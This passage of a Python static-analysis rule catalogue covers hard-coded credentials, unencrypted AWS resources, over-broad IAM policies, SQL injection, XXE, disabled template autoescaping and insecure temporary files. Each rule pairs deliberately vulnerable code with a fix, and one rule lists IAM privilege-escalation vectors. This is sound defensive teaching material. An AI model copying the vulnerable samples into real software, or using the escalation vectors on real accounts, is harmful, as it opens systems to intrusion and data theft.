    default_actions=[network_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="TLS",
    port=1001,
    certificates=[elbv2.CfnListener.CertificateProperty(
        certificate_arn="certificateARN"
    )]
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancerListener:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancerListener(
    external_port=10043,
    external_protocol=elb.LoadBalancingProtocol.SSL,
    internal_port=10043,
    ssl_certificate_arn="certificateARN"
)

elb.LoadBalancerListener(
    external_port=10443,
    external_protocol=elb.LoadBalancingProtocol.HTTPS,
    internal_port=10443,
    ssl_certificate_arn="certificateARN"
)

For aws_cdk.aws_elasticloadbalancing.CfnLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.CfnLoadBalancer(
    self,
    "elb-ssl",
    listeners=[
        elb.CfnLoadBalancer.ListenersProperty(
            instance_port="10043",
            load_balancer_port="10043",
            protocol="ssl",
            ssl_certificate_id=CERTIFICATE_ARN
        )
    ],
    subnets=vpc.select_subnets().subnet_ids
)

elb.CfnLoadBalancer(
    self,
    "elb-https-dict",
    listeners=[
        {
            "instancePort":"10443",
            "loadBalancerPort":"10443",
            "protocol":"https",
            "sslCertificateId":CERTIFICATE_ARN
        }
    ],
    subnets=vpc.select_subnets().subnet_ids
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancer(
    self,
    "elb-ssl",
    vpc=vpc,
    listeners=[
        {
            "externalPort":10044,
            "externalProtocol":elb.LoadBalancingProtocol.SSL,
            "internalPort":10044,
            "sslCertificateArn":"certificateARN"
        },
        {
            "externalPort":10444,
            "externalProtocol":elb.LoadBalancingProtocol.HTTPS,
            "internalPort":10444,
            "sslCertificateArn":"certificateARN"
        }
    ]
)

loadBalancer = elb.LoadBalancer(
        self,
        "elb-multi-listener",
        vpc=vpc
)
loadBalancer.add_listener(
    external_port=10045,
    external_protocol=elb.LoadBalancingProtocol.SSL,
    internal_port=10045,
    ssl_certificate_arn="certificateARN"
)
loadBalancer.add_listener(
    external_port=10445,
    external_protocol=elb.LoadBalancingProtocol.HTTPS,
    internal_port=10445,
    ssl_certificate_arn="certificateARN"
)

For aws_cdk.aws_elasticache.CfnReplicationGroup:

from aws_cdk import (
    aws_elasticache as elasticache
)

elasticache.CfnReplicationGroup(
    self,
    "encrypted-explicit",
    replication_group_description="a test replication group",
    automatic_failover_enabled=False,
    transit_encryption_enabled=True,
    cache_subnet_group_name="test",
    engine="redis",
    engine_version="3.2.6",
    num_cache_clusters=1,
    cache_node_type="cache.t2.micro"
)

For aws_cdk.aws_kinesis.CfnStream:

from aws_cdk import (
    aws_kinesis as kinesis,
)

kinesis.CfnStream(
    self,
    "cfnstream-explicit-encrypted",
    shard_count=1,
    stream_encryption=kinesis.CfnStream.StreamEncryptionProperty(
        encryption_type="KMS",
        key_id="alias/aws/kinesis"
    )
)

stream = kinesis.CfnStream(
    self,
    "cfnstream-explicit-encrypted-dict",
    shard_count=1,
    stream_encryption={
        "encryptionType": "KMS",
        "keyId": "alias/aws/kinesis"
    }
)

For aws_cdk.aws_kinesis.Stream:

from aws_cdk import (
    aws_kinesis as kinesis,
    aws_kms as kms
)

stream = kinesis.Stream( # Encryption is enabled by default for Streams
    self,
    "stream-implicit-encrypted",
    shard_count=1
)

stream = kinesis.Stream(
    self,
    "stream-explicit-encrypted-managed",
    shard_count=1,
    encryption=kinesis.StreamEncryption.MANAGED
)

key = kms.Key(self, "managed_key")
stream = kinesis.Stream(
    self,
    "stream-explicit-encrypted-selfmanaged",
    shard_count=1,
    encryption=kinesis.StreamEncryption.KMS,
    encryption_key=key
)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.
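As a sketch of this exception, the following clear-text URLs target the loopback interface and would therefore not be reported (the URLs themselves are illustrative):

```python
from urllib.parse import urlparse

# Clear-text schemes are tolerated when traffic never leaves the machine.
local_urls = [
    "http://127.0.0.1:8080/health",  # Compliant, loopback address
    "ftp://localhost/files",         # Compliant, loopback hostname
]

for url in local_urls:
    assert urlparse(url).hostname in ("127.0.0.1", "localhost")
```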

See

python:S2068

Because it is easy to extract strings from an application's source code or binaries, credentials should not be hard-coded. This is particularly true for applications that are distributed or open-source.

In the past, hard-coded credentials have been at the root of several publicly disclosed vulnerabilities.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

username = 'admin'
password = 'admin' # Sensitive
usernamePassword = 'user=admin&password=admin' # Sensitive

Compliant Solution

import os

username = os.getenv("username") # Compliant
password = os.getenv("password") # Compliant
usernamePassword = 'user=%s&password=%s' % (username, password) # Compliant

See

python:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws_cdk.aws_rds.DatabaseCluster and aws_cdk.aws_rds.DatabaseInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.DatabaseCluster( # Sensitive, unencrypted by default
            self,
            "example"
        )

For aws_cdk.aws_rds.CfnDBCluster and aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.CfnDBCluster( # Sensitive, unencrypted by default
            self,
            "example"
        )

Compliant Solution

For aws_cdk.aws_rds.DatabaseCluster and aws_cdk.aws_rds.DatabaseInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.DatabaseCluster(
            self,
            "example",
            storage_encrypted=True
        )

For aws_cdk.aws_rds.CfnDBCluster and aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.CfnDBCluster(
            self,
            "example",
            storage_encrypted=True
        )

See

python:S6302

A policy that grants all permissions may indicate improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwrite of resources may occur and result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least-privilege principle, i.e. to grant identities only the permissions they need. A good practice is to start with the very minimum set of permissions and to refine the policy over time. To fix overly permissive policies already deployed in production, one strategy is to review the monitored activity and reduce the set of permissions to those actually used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

from aws_cdk.aws_iam import PolicyStatement, Effect

PolicyStatement(
    effect=Effect.ALLOW,
    actions=["*"], # Sensitive
    resources=["arn:aws:iam:::user/*"]
)

Compliant Solution

A customer-managed policy that grants only the required permissions:

from aws_cdk.aws_iam import PolicyStatement, Effect

PolicyStatement(
    effect=Effect.ALLOW,
    actions=["iam:GetAccountSummary"],
    resources=["arn:aws:iam:::user/*"]
)

See

python:S6308

Amazon OpenSearch Service is a managed service to host OpenSearch instances. It replaces Elasticsearch Service, which has been deprecated.

To harden domain (cluster) data in case of unauthorized access, OpenSearch provides data-at-rest encryption if the engine is OpenSearch (any version), or Elasticsearch with a version of 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, adversaries cannot access the data if they gain physical access to the storage medium.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt OpenSearch domains that contain sensitive information.

OpenSearch handles encryption and decryption transparently, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_opensearchservice.Domain:

from aws_cdk.aws_opensearchservice import Domain, EngineVersion

class DomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        Domain(self, "Sensitive",
            version=EngineVersion.OPENSEARCH_1_3
        ) # Sensitive, encryption is disabled by default

For aws_cdk.aws_opensearchservice.CfnDomain:

from aws_cdk.aws_opensearchservice import CfnDomain

class CfnDomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        CfnDomain(self, "Sensitive") # Sensitive, encryption is disabled by default

Compliant Solution

For aws_cdk.aws_opensearchservice.Domain:

from aws_cdk.aws_opensearchservice import Domain, EncryptionAtRestOptions, EngineVersion

class DomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        Domain(self, "Compliant",
            version=EngineVersion.OPENSEARCH_1_3,
            encryption_at_rest=EncryptionAtRestOptions(
                enabled=True
            )
        )

For aws_cdk.aws_opensearchservice.CfnDomain:

from aws_cdk.aws_opensearchservice import CfnDomain

class CfnDomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        CfnDomain(self, "Compliant",
            encryption_at_rest_options=CfnDomain.EncryptionAtRestOptionsProperty(
                enabled=True
            )
        )

See

python:S6437

Why is this an issue?

A hard-coded secret has been found in your code. You should quickly list where this secret is used, revoke it, and then change it in every system that uses it.

Passwords, secrets, and any type of credentials should only be used to authenticate a single entity (a person or a system).

If you allow third parties to authenticate as another system or person, they can impersonate legitimate identities and undermine trust within the organization.
It does not matter whether the impersonation is malicious: in either case, it is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

Keeping credentials in plain text in a code base is tantamount to sharing that password with anyone who has access to the source code and runtime servers.
Thus, it is a breach of trust, as these individuals have the ability to impersonate others.

Secret management services are the most efficient tools to store credentials and protect the identities associated with them.
Cloud providers and on-premise services can be used for this purpose.

If storing credentials in a secret data management service is not possible, follow these guidelines:

  • Do not store credentials in a file that an excessive number of people can access.
    • For example, not in code, not in a spreadsheet, not on a sticky note, and not on a shared drive.
  • Use the production operating system to protect password access control.
    • For example, in a file whose permissions are restricted and protected with chmod and chown.
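The file-permission guideline above can also be sketched in Python; the path here is created with tempfile purely for illustration (a real deployment would use a fixed, deployment-managed location):

```python
import os
import stat
import tempfile

# Stand-in for a credentials file; a real one would live at a fixed path.
fd, path = tempfile.mkstemp()
os.close(fd)

# Restrict access to the owner only -- the equivalent of `chmod 600`.
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)

mode = stat.S_IMODE(os.stat(path).st_mode)
assert mode == 0o600  # group and others have no access

os.remove(path)
```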

Noncompliant code example

from requests_oauthlib.oauth2_session import OAuth2Session

scope = ['https://www.api.example.com/auth/example.data']

oauth = OAuth2Session(
    'example_client_id',
    redirect_uri='https://callback.example.com/uri',
    scope=scope)

token = oauth.fetch_token(
        'https://api.example.com/o/oauth2/token',
        client_secret='example_Password') # Noncompliant

data = oauth.get('https://www.api.example.com/oauth2/v1/exampledata')

Compliant solution

Using AWS Secrets Manager:

import boto3
from requests_oauthlib.oauth2_session import OAuth2Session

def get_client_secret():

    session = boto3.session.Session()
    client = session.client(service_name='secretsmanager', region_name='eu-west-1')

    return client.get_secret_value(SecretId='example_oauth_secret_id')['SecretString']

client_secret = get_client_secret()
scope = ['https://www.api.example.com/auth/example.data']

oauth = OAuth2Session(
    'example_client_id',
    redirect_uri='https://callback.example.com/uri',
    scope=scope)

token = oauth.fetch_token(
        'https://api.example.com/o/oauth2/token',
        client_secret=client_secret)

data = oauth.get('https://www.api.example.com/oauth2/v1/exampledata')

Using Azure Key Vault Secret:

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential

def get_client_secret():
    vault_uri = "https://example.vault.azure.net"
    credential = DefaultAzureCredential()
    client = SecretClient(vault_url=vault_uri, credential=credential)

    return client.get_secret('example_oauth_secret_name').value

client_secret = get_client_secret()
scope = ['https://www.api.example.com/auth/example.data']

oauth = OAuth2Session(
    'example_client_id',
    redirect_uri='https://callback.example.com/uri',
    scope=scope)

token = oauth.fetch_token(
        'https://api.example.com/o/oauth2/token',
        client_secret=client_secret)

data = oauth.get('https://www.api.example.com/oauth2/v1/exampledata')

Resources

python:S6317

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permissions to an identity (a user, a group, or a role) are called identity-based policies. They give that identity the ability to perform a predefined set of actions on a list of resources.

Here is an example of a policy document defining a limited set of permissions that lets users manage their own access keys.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "arn:aws:iam::245500951992:user/${aws:username}",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Privilege escalation generally happens when an identity policy gives an identity the ability to grant more privileges than the ones it already has. Here is another example of a policy document that hides a privilege escalation. It allows an identity to generate a new access key for any user from the account, including users with high privileges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "*",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Although it looks like it grants a limited set of permissions, this policy would, in practice, give the highest privileges to the identity it’s attached to.

Privilege escalation is a serious issue: it allows a malicious user to escalate from a low-privilege identity under their control to a high-privilege one.

The example above is just one of many permission escalation vectors. Here is the list of vectors that the rule can detect:

  • Create Policy Version: create a new IAM policy and set it as default.
  • Set Default Policy Version: set a different IAM policy version as default.
  • Create AccessKey: create a new access key for any user.
  • Create Login Profile: create a login profile with a password chosen by the attacker.
  • Update Login Profile: update the existing password with one chosen by the attacker.
  • Attach User Policy: attach a permissive IAM policy like "AdministratorAccess" to a user the attacker controls.
  • Attach Group Policy: attach a permissive IAM policy like "AdministratorAccess" to a group containing a user the attacker controls.
  • Attach Role Policy: attach a permissive IAM policy like "AdministratorAccess" to a role that can be assumed by the user the attacker controls.
  • Put User Policy: alter the existing inline IAM policy of a user the attacker controls.
  • Put Group Policy: alter the existing inline IAM policy of a group containing a user the attacker controls.
  • Put Role Policy: alter an existing inline IAM role policy; the role can then be assumed by the user the attacker controls.
  • Add User to Group: add a user the attacker controls to a group that has a larger range of permissions.
  • Update Assume Role Policy: update a role’s "AssumeRolePolicyDocument" to allow a user the attacker controls to assume it.
  • EC2: create an EC2 instance that will execute with high privileges.
  • Lambda Create and Invoke: create a Lambda function that will execute with high privileges and invoke it.
  • Lambda Create and Add Permission: create a Lambda function that will execute with high privileges and grant a user or a service permission to invoke it.
  • Lambda triggered with an external event: create a Lambda function that will execute with high privileges and link it to an external event.
  • Update Lambda code: update the code of a Lambda function executing with high privileges.
  • CloudFormation: create a CloudFormation stack that will execute with high privileges.
  • Data Pipeline: create a Data Pipeline that will execute with high privileges.
  • Glue Development Endpoint: create a Glue development endpoint that will execute with high privileges.
  • Update Glue Dev Endpoint: update the SSH key associated with the Glue endpoint.

The general recommendation to protect against privilege escalation is to restrict the resources to which sensitive permissions are granted. The first example above is a good demonstration of sensitive permissions being used with a narrow scope of resources and where no privilege escalation is possible.

Noncompliant code example

The following policy allows an attacker to update the code of any Lambda function. An attacker can achieve privilege escalation by altering the code of a Lambda that executes with high privileges.

from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions=["lambda:UpdateFunctionCode"],
            resources=["*"]  # Noncompliant
        )
    ]
)

Compliant solution

Narrow the policy such that only updates to the code of certain Lambda functions are allowed.

from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions=["lambda:UpdateFunctionCode"],
            resources=[
                "arn:aws:lambda:us-east-2:123456789012:function:my-function:1"
            ]
        )
    ]
)

Resources

python:S2077

Formatted SQL queries can be difficult to maintain and debug, and concatenating untrusted values into them increases the risk of SQL injection. Note, however, that this rule does not detect SQL injection itself (unlike rule S3649); its goal is only to highlight complex, formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use parameterized queries, prepared statements, or stored procedures, and bind user-provided values as parameters instead of concatenating them into the SQL string.

Sensitive Code Example

from django.db import models
from django.db import connection
from django.db import connections
from django.db.models.expressions import RawSQL

value = input()


class MyUser(models.Model):
    name = models.CharField(max_length=200)


def query_my_user(request, params, value):
    with connection.cursor() as cursor:
        cursor.execute("{0}".format(value))  # Sensitive

    # https://docs.djangoproject.com/en/2.1/ref/models/expressions/#raw-sql-expressions

    RawSQL("select col from %s where mycol = %s and othercol = " + value, ("test",))  # Sensitive

    # https://docs.djangoproject.com/en/2.1/ref/models/querysets/#extra

    MyUser.objects.extra(
        select={
            'mycol': "select col from sometable where mycol = %s and othercol = " + value  # Sensitive
        },
        select_params=(someparam,),
    )

Compliant Solution

cursor = connection.cursor(prepared=True)
sql_select_query = """select col from sometable where mycol = %s and othercol = %s"""

select_tuple = (1, value)

cursor.execute(sql_select_query, select_tuple) # Compliant, the query is parameterized
connection.commit()
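The same parameter-binding pattern works with any DB-API driver. A self-contained sketch using the standard-library sqlite3 module (the table and data are illustrative) shows that a bound value cannot alter the query structure:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE sometable (mycol TEXT, othercol TEXT, col TEXT)")
conn.execute("INSERT INTO sometable VALUES (?, ?, ?)", ("a", "b", "found"))

hostile = "a' OR '1'='1"  # harmless once bound as a parameter
rows = conn.execute(
    "SELECT col FROM sometable WHERE mycol = ? AND othercol = ?",
    (hostile, "b"),
).fetchall()
assert rows == []  # the injection attempt matches no row

rows = conn.execute(
    "SELECT col FROM sometable WHERE mycol = ? AND othercol = ?",
    ("a", "b"),
).fetchall()
assert rows == [("found",)]
```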

See

python:S6319

Amazon SageMaker is a managed machine learning service in a hosted, production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information, which should not be stored unencrypted. With encryption at rest enabled, adversaries who gain physical access to the storage media cannot decrypt the data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sagemaker.CfnNotebookInstance:

from aws_cdk import (
    aws_sagemaker as sagemaker
)

class CfnSagemakerStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        sagemaker.CfnNotebookInstance(
            self, "Sensitive",
            instance_type="instanceType",
            role_arn="roleArn"
        )  # Sensitive, no KMS key is set by default; thus, encryption is disabled

Compliant Solution

For aws_cdk.aws_sagemaker.CfnNotebookInstance:

from aws_cdk import (
    aws_sagemaker as sagemaker,
    aws_kms as kms
)

class CfnSagemakerStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        my_key = kms.Key(self, "Key")
        sagemaker.CfnNotebookInstance(
            self, "Compliant",
            instance_type="instanceType",
            role_arn="roleArn",
            kms_key_id=my_key.key_id
        )

See

python:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Python Standard Library

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

import xml.sax
from xml.sax.handler import feature_external_ges

parser = xml.sax.make_parser()
myHandler = MyHandler()
parser.setContentHandler(myHandler)
parser.setFeature(feature_external_ges, True)  # Noncompliant
parser.parse('xxe.xml')

Compliant solution

Since Python 3.7.1, the SAX parser does not process general external entities by default.

import xml.sax
from xml.sax.handler import feature_external_ges

parser = xml.sax.make_parser()
myHandler = MyHandler()
parser.setContentHandler(myHandler)
parser.setFeature(feature_external_ges, False)
parser.parse('xxe.xml')

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.
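If your parser exposes an entity-resolution hook, the allow-list approach can be sketched with xml.sax’s EntityResolver (a minimal illustration; the trusted-entity URL is a hypothetical placeholder):

```python
import io
from xml.sax.handler import EntityResolver
from xml.sax.xmlreader import InputSource

# Hypothetical allow-list of entity system IDs the application trusts.
TRUSTED_ENTITIES = {"file:///etc/app/safe-entities.dtd"}

class AllowListResolver(EntityResolver):
    def resolveEntity(self, publicId, systemId):
        if systemId in TRUSTED_ENTITIES:
            return systemId  # let the parser fetch a trusted entity
        # Substitute an empty source for anything not explicitly trusted.
        source = InputSource()
        source.setCharacterStream(io.StringIO(""))
        return source
```

A parser configured with `parser.setEntityResolver(AllowListResolver())` would then silently drop any entity outside the allow-list instead of fetching it.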

Resources

Standards

python:S5439

This rule is deprecated; use S5247 instead.

Why is this an issue?

Template engines have an HTML autoescape mechanism that protects web applications against most common cross-site-scripting (XSS) vulnerabilities.

By default, it automatically replaces HTML special characters in any template variables. This secure by design configuration should not be globally disabled.

Escaping HTML from template variables prevents switching into any execution context, like <script>. Disabling autoescaping forces developers to manually escape each template variable for the application to be safe. A more pragmatic approach is to escape by default and to manually disable escaping when needed.
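What autoescaping does under the hood can be illustrated with the standard library’s html.escape (a sketch of the escaping itself, not of any template engine’s internals):

```python
import html

user_input = "<script>alert('xss')</script>"
# Escaping replaces HTML special characters with entities, so the payload
# is rendered as inert text instead of being executed by the browser.
safe = html.escape(user_input)
# safe == "&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;"
```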

A successful exploitation of a cross-site-scripting vulnerability allows an attacker to execute malicious JavaScript code in a user’s web browser. The most severe XSS attacks involve:

  • Forced redirection
  • Modification of the content’s presentation
  • Takeover of user accounts after disclosure of sensitive information such as session cookies or passwords

This rule supports the following libraries:

Noncompliant code example

from jinja2 import Environment

env = Environment() # Noncompliant; New Jinja2 Environment has autoescape set to false
env = Environment(autoescape=False) # Noncompliant

Compliant solution

from jinja2 import Environment
env = Environment(autoescape=True) # Compliant

Resources

python:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas, like /tmp on Linux-based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such APIs ensure that:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

file = open("/tmp/temporary_file","w+") # Sensitive
tmp_dir = os.environ.get('TMPDIR') # Sensitive
file = open(tmp_dir+"/temporary_file","w+")

Compliant Solution

import tempfile

file = tempfile.TemporaryFile(dir="/tmp/my_subdirectory", mode="w+")  # Compliant
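Along the same lines, tempfile.mkstemp creates the file atomically with an unpredictable name and owner-only permissions (a minimal sketch; with mkstemp the caller is responsible for cleanup):

```python
import os
import tempfile

# mkstemp opens the file with O_EXCL and mode 0o600, so no other user can
# pre-create or read it; it returns an open descriptor and the path.
fd, path = tempfile.mkstemp(suffix=".tmp")
with os.fdopen(fd, "w+") as tmp:
    tmp.write("temporary data")
os.remove(path)  # mkstemp does not delete the file automatically
```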

See

python:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

import tempfile

filename = tempfile.mktemp() # Noncompliant
tmp_file = open(filename, "w+")

Compliant solution

import tempfile

tmp_file1 = tempfile.NamedTemporaryFile(delete=False)
tmp_file2 = tempfile.NamedTemporaryFile()

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Use a secure API function

Temporary file handling APIs generally provide secure functions to create temporary files. In most cases, they operate atomically, creating and opening a file with a unique and unpredictable name in a single call. Those functions can often replace less secure alternatives without significant development effort.

Here, the example compliant code uses the more secure tempfile.NamedTemporaryFile function to handle the temporary file creation.

Strong security controls

